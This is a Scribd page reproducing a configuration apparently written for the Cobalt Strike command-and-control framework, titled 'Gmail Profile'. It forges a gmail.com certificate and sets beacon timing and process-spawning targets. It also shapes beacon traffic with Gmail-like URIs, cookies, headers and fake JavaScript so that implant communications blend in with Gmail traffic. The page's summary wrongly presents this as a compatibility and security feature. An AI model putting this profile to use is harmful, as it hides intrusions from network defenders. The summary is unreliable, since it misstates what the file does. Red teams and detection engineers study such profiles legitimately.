Scribd
Upload
20 views3 pages

Gmail Profile

The document outlines a configuration for making requests mimic those of Gmail's web interface. It includes settings for HTTPS certificates, DNS beacons, and HTTP GET/POST requests with specific headers and parameters. The configuration aims to ensure that requests are formatted and processed similarly to those made by Gmail, enhancing compatibility and security.

Uploaded by

scribdfoo1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
20 views3 pages

Gmail Profile

The document outlines a configuration for making requests mimic those of Gmail's web interface. It includes settings for HTTPS certificates, DNS beacons, and HTTP GET/POST requests with specific headers and parameters. The configuration aims to ensure that requests are formatted and processed similarly to those made by Gmail, enhancing compatibility and security.

Uploaded by

scribdfoo1
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

# Make requests look like GMail web requests

#
# Author: @ChrisTruncer

https-certificate {
set CN "gmail.com";
set O "Google GMail";
set C "US";
set L "Mountain View";
set OU "Google Mail";
set ST "CA";
set validity "365";
}

set sleeptime "60000";


set pipename "interprocess_##";
set jitter "15";

dns-beacon {
set dns_idle "8.8.4.4";
}

post-ex {
set spawnto_x86 "%windir%\\syswow64\\userinit.exe";
set spawnto_x64 "%windir%\\sysnative\\userinit.exe";
}

http-get {
set uri "/_/scs/mail-static/_/js/";
client {

metadata {
base64;
prepend "OSID=";
header "Cookie";
}

header "Accept"
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
header "Accept-Language" "en-US,en;q=0.5";
header "Accept-Encoding" "gzip, deflate";
header "DNT" "1";
}

server {
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "Cache-Control" "public, max-age=31536000";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Alternate-Protocol" "443:quic,p=1";

output{
prepend "try(";
prepend "O(L.Oa(),\"sy580\")";
prepend "N(L.Oa(),\"sy580\");P(L.Oa(),\"sy580\");";
prepend ")catch(e)(_DumpException(e))";
prepend "try(";
prepend "O(L.Oa(),\"sy558\");";
prepend "N(L.Oa(),\"sy558\");P(L.Oa(),\"sy558\");";
prepend ")catch(e)(_DumpException(e))";
prepend "try(";

append "var
f2=function(a)(a=a.wa;return\"application/chromium-bookmark-
folder\"==a||\"application/chromium-root-folder\"==a||\"application/
vnd.google-apps.folder\"==a||\"application/vnd.google-
apps.photoalbum\"==a||\"application/vnd.google-
apps.rollupphotoalbum\"==a)";
append ",g2=function(a)(return a.ra),s8d=function(a)
(return a?hb(a,function(a)(return new UP(a)):[]),h2=function(a)(switch(a)
(case \"all\":case \"docs-images\":case \"docs-images-and-
videos\":case \"docs-
videos\":case \"documents\":case \"drawings\":case \"folders\":case \"for
ms\":case \"pdfs\":case \"presentations\":case \"sites\":case \"spreadshe
ets\":case \"tables\":return!0)return!1); O(L.Oa(),\"sy588\")";

print;

}
}
}

http-post {
set uri "/mail/u/0/";
client {
parameter "ui" "d3244c4707";
parameter "hop" "6928632";
parameter "start" "0";
header "Content-Type" "application/x-www-form-
urlencoded;charset=utf-8";

id {
base64;
prepend "OSID=";
header "Cookie";
}

output{
base64;
print;
}
}

server {
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "Cache-Control" "no-cache, no-store, max-age=0, must-
revalidate";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";

output {

prepend "[[[\"apm\",\"";

append "\"]";
append ",[\"ci\",[]";
append "]";
append ",[\"cm\",[]";
append ",[]";
append "]";
append "],'dbb8796a80d45e1f']";

print;
}

}
}

You might also like